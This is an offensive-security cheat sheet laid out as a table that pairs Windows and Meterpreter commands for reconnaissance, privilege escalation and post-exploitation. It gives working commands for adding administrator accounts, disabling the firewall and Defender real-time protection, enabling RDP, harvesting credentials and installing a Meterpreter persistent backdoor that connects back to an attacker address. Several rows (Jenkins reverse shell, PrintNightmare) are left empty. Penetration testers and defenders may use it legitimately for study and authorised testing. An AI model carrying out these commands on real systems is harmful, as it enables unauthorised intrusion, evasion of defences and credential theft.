Command Group | Task | Windows Command | Meterpreter Command | Comments |
---|---|---|---|---|
Information Gathering | Get System Information | systeminfo | sysinfo | |
Information Gathering | Get Current Directory | echo %cd% | pwd | |
Information Gathering | Get Current User | echo %username% or whoami | getuid | |
Information Gathering | Show Current User Privileges | whoami /priv | run post/windows/gather/win_privs | |
Information Gathering | Find a File or Service | where | search -h; -d for directory | |
Information Gathering | Show Running Services | wmic service list brief | run post/windows/gather/enum_services | |
Information Gathering | Show Installed Applications | net start | run post/windows/gather/enum_applications | |
Information Gathering | Show Process Tree | tasklist | ps | |
Information Gathering | Show Users' User Groups | net user username | ||
Information Gathering | Check Windows Patching | wmic qfe get Caption,Description,HotFixID,InstalledOn | ||
Information Gathering | Enumerate AD Domains | net view /domains or net group "Domain Controllers" domain | run post/windows/gather/enum_domains | |
Information Gathering | Enumerate AD Users | net user /domain | run post/windows/gather/enum_ad_users | |
Information Gathering | List Available Shares | net share | run post/windows/gather/enum_shares | |
Information Gathering | Show Computer Groups | net localgroup | ||
Information Gathering | Show User Group Association | net localgroup groupname | ||
Information Gathering | Show Logged On Users | From elevated PowerShell - Get-Process -IncludeUserName | Select-Object -Unique -Property UserName | run post/windows/gather/enum_logged_on_users | Note that "query user" works on Win10 Pro |
Information Gathering | LDAP Enumeration | From Kali - nslookup -type=srv _ldap._tcp.els.bank | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'
| ||
Network Mapping | Gather Network Interface Info | ipconfig /all | ifconfig | |
Network Mapping | Gather Routing Table Information | route print | route | |
Network Mapping | ARP Table Information | arp -a | arp | |
Network Mapping | Gather Network Connections | netstat -ano | netstat | |
Network Mapping | Show DNS Information | ipconfig /displaydns | ||
Exploitation | Create New User (if privileged) | net user username password /add | Append /domain to modify domain account | |
Exploitation | Modify User Privileges | net localgroup "Administrators" username /add | Append /domain to modify domain account | |
Exploitation | Auto-Escalate Privileges | getsystem | ||
Exploitation | Check Unquoted Service Paths | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """ | ||
Exploitation | Check Service Status | sc query servicename | ||
Exploitation | Check Auto Run Programs and Services | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | ||
Exploitation | PrintNightmare | Multiple
| ||
Post-Exploitation | Gather Available Credentials | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | run post/windows/gather/credentials/credential_collector | Also see Mimikatz |
Post-Exploitation | Create New User with Admin Privileges | net user username password /add && net localgroup "administrators username /add | ||
Post-Exploitation | Enable RDP on Machine | Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0; Enable-NetFirewallRule -DisplayGroup "Remote Desktop" | run getgui -e | |
Post-Exploitation | Check Firewall Status | netsh advfirewall show currentprofile | ||
Post-Exploitation | Disable Firewall | netsh advfirewall set allprofiles state off | ||
Post-Exploitation | Disable Antivirus | Powershell - Set-MpPreference -DisableRealtimeMonitoring $true | ||
Post-Exploitation | Check Scheduled Tasks | schtasks /query /fo LIST /v | ||
Post-Exploitation | Check AutoRun Programs and Services | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | ||
Post-Exploitation | Persistent Back Door | run persistence -A -X -i 5 -p 8080 -r ipaddr | ||
Post-Exploitation | Grant Admin Permissions to Directories | icacls Administrator\Desktop /grant james:(OI)(CI)F /T | ||
Post-Exploitation | Autologin Credentials | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | ||
Post-Exploitation | FTP File Transfer | See notes | ||
Post-Exploitation | Jenkins Reverse Shell | |||
Exploitation | Responder/ntlmrelayx | |||